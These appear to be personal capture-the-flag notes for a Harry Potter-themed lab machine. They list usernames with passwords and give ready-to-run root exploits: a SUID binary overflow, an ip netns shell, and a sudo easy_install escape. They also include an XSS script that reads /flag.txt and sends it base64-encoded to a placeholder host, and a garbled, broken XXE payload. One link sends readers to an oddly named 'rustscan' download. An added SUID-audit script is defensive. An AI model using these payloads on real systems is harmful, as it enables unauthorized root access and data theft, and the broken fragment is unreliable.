http://10.10.217.224/api/#1bitch

you need rustscan for this machine, download here: https://github.com/Macchimne/RUSTSCAN

Users:

hermoine

neville:eos34dqa7qgwq8@006oudrri1, 6l8084#ufcz2r5mh45nis!3yc

draco:slytherin

Paths to root

/etc/room_of_requirement is a suid binary that will grant a root shell with: { echo -e "012345678901234567890123\xbe\xba\xfe\xca"; cat; } | /etc/room_of_requirement

(/bin/ip) has the suid bit set. this can get root via:

```sh
ip netns add foo
ip netns exec foo /bin/sh -p
```

hermoine can run date as sudo, though this just allows file read as far as i can tell with date -f file

draco can run easy_install as root, which can privesc via:

```sh
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF
```
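A defender-side check for the two set-uid findings above (a set-uid file living in /etc, and the set-uid bit on ip), as an added example that is not part of the original notes. The allowed-directory list and the risky-name list are assumptions for this sketch, not a complete policy.

```shell
#!/bin/sh
# Added example: list set-uid files that deserve review.
# ALLOWED_DIRS and RISKY_NAMES are assumptions; tune them per host baseline.
ALLOWED_DIRS="/bin /sbin /usr/bin /usr/sbin /usr/lib /usr/libexec"
RISKY_NAMES="ip"    # binaries that should never carry the set-uid bit

# classify_suid PATH [SCAN_ROOT] -> prints risky-binary, odd-location or ok
classify_suid() {
    path=${1#"${2-}"}          # strip the scan root so a test tree maps onto /
    name=${path##*/}
    for r in $RISKY_NAMES; do
        if [ "$name" = "$r" ]; then echo "risky-binary"; return 0; fi
    done
    for d in $ALLOWED_DIRS; do
        case $path in
            "$d"/*) echo "ok"; return 0 ;;
        esac
    done
    echo "odd-location"        # e.g. a set-uid file under /etc
}

# audit_suid ROOT -> one "verdict<TAB>path" line per set-uid file not rated ok
audit_suid() {
    root=${1%/}
    find "${root:-/}" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        verdict=$(classify_suid "$f" "$root")
        if [ "$verdict" != "ok" ]; then
            printf '%s\t%s\n' "$verdict" "$f"
        fi
    done
}

# Usage on a live host (run as root to see every directory):
#   audit_suid /
```

Removing the bit with `chmod u-s` on each flagged file closes both paths; the output is meant to be diffed against a known-good baseline.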

<script>  
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})  
.then(response => response.text())  
.then(text => {  
fetch('http://ip:port/' + btoa(text), {mode:'no-cors'});  
});  
</script>

Day 1

  • An "MS Windows shortcut", also known as a .lnk file. This file type is used in Windows to link to another file, folder, or application. These shortcuts can also be used to run commands!
  • Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before the attacker can learn their identity.

Day 5

  • XXE Payload:

```xml
]> 1 &payload;
```